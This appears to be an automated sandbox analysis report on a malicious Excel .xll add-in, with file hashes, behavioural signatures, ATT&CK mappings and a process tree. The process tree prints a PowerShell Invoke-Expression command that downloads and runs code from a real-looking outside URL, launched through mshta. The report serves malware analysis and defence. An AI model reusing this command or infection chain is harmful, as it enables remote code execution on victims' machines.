Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    23-05-2024 00:50

General

  • Target

    8405485f0e444b4788b3485d56eb1d7a79afcf6f5896268b4c26b3ba070c913e.xll

  • Size

    12KB

  • MD5

    5782bce05a477af3d8504a4ea8854f54

  • SHA1

    2d795f303173b858063166709fd5852c7cf3499b

  • SHA256

    8405485f0e444b4788b3485d56eb1d7a79afcf6f5896268b4c26b3ba070c913e

  • SHA512

    3715862c3e61d1502b5b0a524e1a15c7c0acc15c0db392c5b312bd6f7a8951197c2c3c3ae0bc082fffdb5080a4184a8732742e1bdab63140ccf9cc00e2008eb9

  • SSDEEP

    192:ZL29RBzDzeobchBj8JONiONgruCrEPEjr7Ahx:529jnbcvYJODiuCvr7Cx

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\8405485f0e444b4788b3485d56eb1d7a79afcf6f5896268b4c26b3ba070c913e.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3784
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3956
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4116

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR1DMZ2N\d[1].htm
    Filesize

    2KB

    MD5

    f754844cfb65838d1dd6b19dde5d835c

    SHA1

    b3eb677783adc88c8d048898449e04d49f416db6

    SHA256

    3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

    SHA512

    f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

  • C:\Users\Admin\AppData\Local\Temp\8405485f0e444b4788b3485d56eb1d7a79afcf6f5896268b4c26b3ba070c913e.xll
    Filesize

    12KB

    MD5

    5782bce05a477af3d8504a4ea8854f54

    SHA1

    2d795f303173b858063166709fd5852c7cf3499b

    SHA256

    8405485f0e444b4788b3485d56eb1d7a79afcf6f5896268b4c26b3ba070c913e

    SHA512

    3715862c3e61d1502b5b0a524e1a15c7c0acc15c0db392c5b312bd6f7a8951197c2c3c3ae0bc082fffdb5080a4184a8732742e1bdab63140ccf9cc00e2008eb9

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v1ybjnzk.c5v.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3784-10-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-11-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-23-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-6-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-7-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-8-0x00007FF973510000-0x00007FF973520000-memory.dmp
    Filesize

    64KB

  • memory/3784-9-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-25-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-0-0x00007FF975730000-0x00007FF975740000-memory.dmp
    Filesize

    64KB

  • memory/3784-13-0x00007FF973510000-0x00007FF973520000-memory.dmp
    Filesize

    64KB

  • memory/3784-15-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-16-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-24-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-12-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-17-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-19-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-20-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-18-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-22-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-21-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-14-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-5-0x00007FF9B5743000-0x00007FF9B5744000-memory.dmp
    Filesize

    4KB

  • memory/3784-3-0x00007FF975730000-0x00007FF975740000-memory.dmp
    Filesize

    64KB

  • memory/3784-4-0x00007FF975730000-0x00007FF975740000-memory.dmp
    Filesize

    64KB

  • memory/3784-2-0x00007FF975730000-0x00007FF975740000-memory.dmp
    Filesize

    64KB

  • memory/3784-91-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/3784-89-0x00007FF975730000-0x00007FF975740000-memory.dmp
    Filesize

    64KB

  • memory/3784-90-0x00007FF975730000-0x00007FF975740000-memory.dmp
    Filesize

    64KB

  • memory/3784-88-0x00007FF975730000-0x00007FF975740000-memory.dmp
    Filesize

    64KB

  • memory/3784-87-0x00007FF975730000-0x00007FF975740000-memory.dmp
    Filesize

    64KB

  • memory/3784-1-0x00007FF975730000-0x00007FF975740000-memory.dmp
    Filesize

    64KB

  • memory/3784-71-0x00007FF9B56A0000-0x00007FF9B58A9000-memory.dmp
    Filesize

    2.0MB

  • memory/4116-61-0x0000000006770000-0x000000000678E000-memory.dmp
    Filesize

    120KB

  • memory/4116-62-0x00000000067B0000-0x00000000067FC000-memory.dmp
    Filesize

    304KB

  • memory/4116-63-0x0000000007DC0000-0x000000000843A000-memory.dmp
    Filesize

    6.5MB

  • memory/4116-64-0x0000000006CA0000-0x0000000006CBA000-memory.dmp
    Filesize

    104KB

  • memory/4116-60-0x0000000006390000-0x00000000066E7000-memory.dmp
    Filesize

    3.3MB

  • memory/4116-53-0x00000000062A0000-0x0000000006306000-memory.dmp
    Filesize

    408KB

  • memory/4116-50-0x0000000006230000-0x0000000006296000-memory.dmp
    Filesize

    408KB

  • memory/4116-49-0x0000000005900000-0x0000000005922000-memory.dmp
    Filesize

    136KB

  • memory/4116-48-0x0000000005B00000-0x000000000612A000-memory.dmp
    Filesize

    6.2MB

  • memory/4116-47-0x00000000032D0000-0x0000000003306000-memory.dmp
    Filesize

    216KB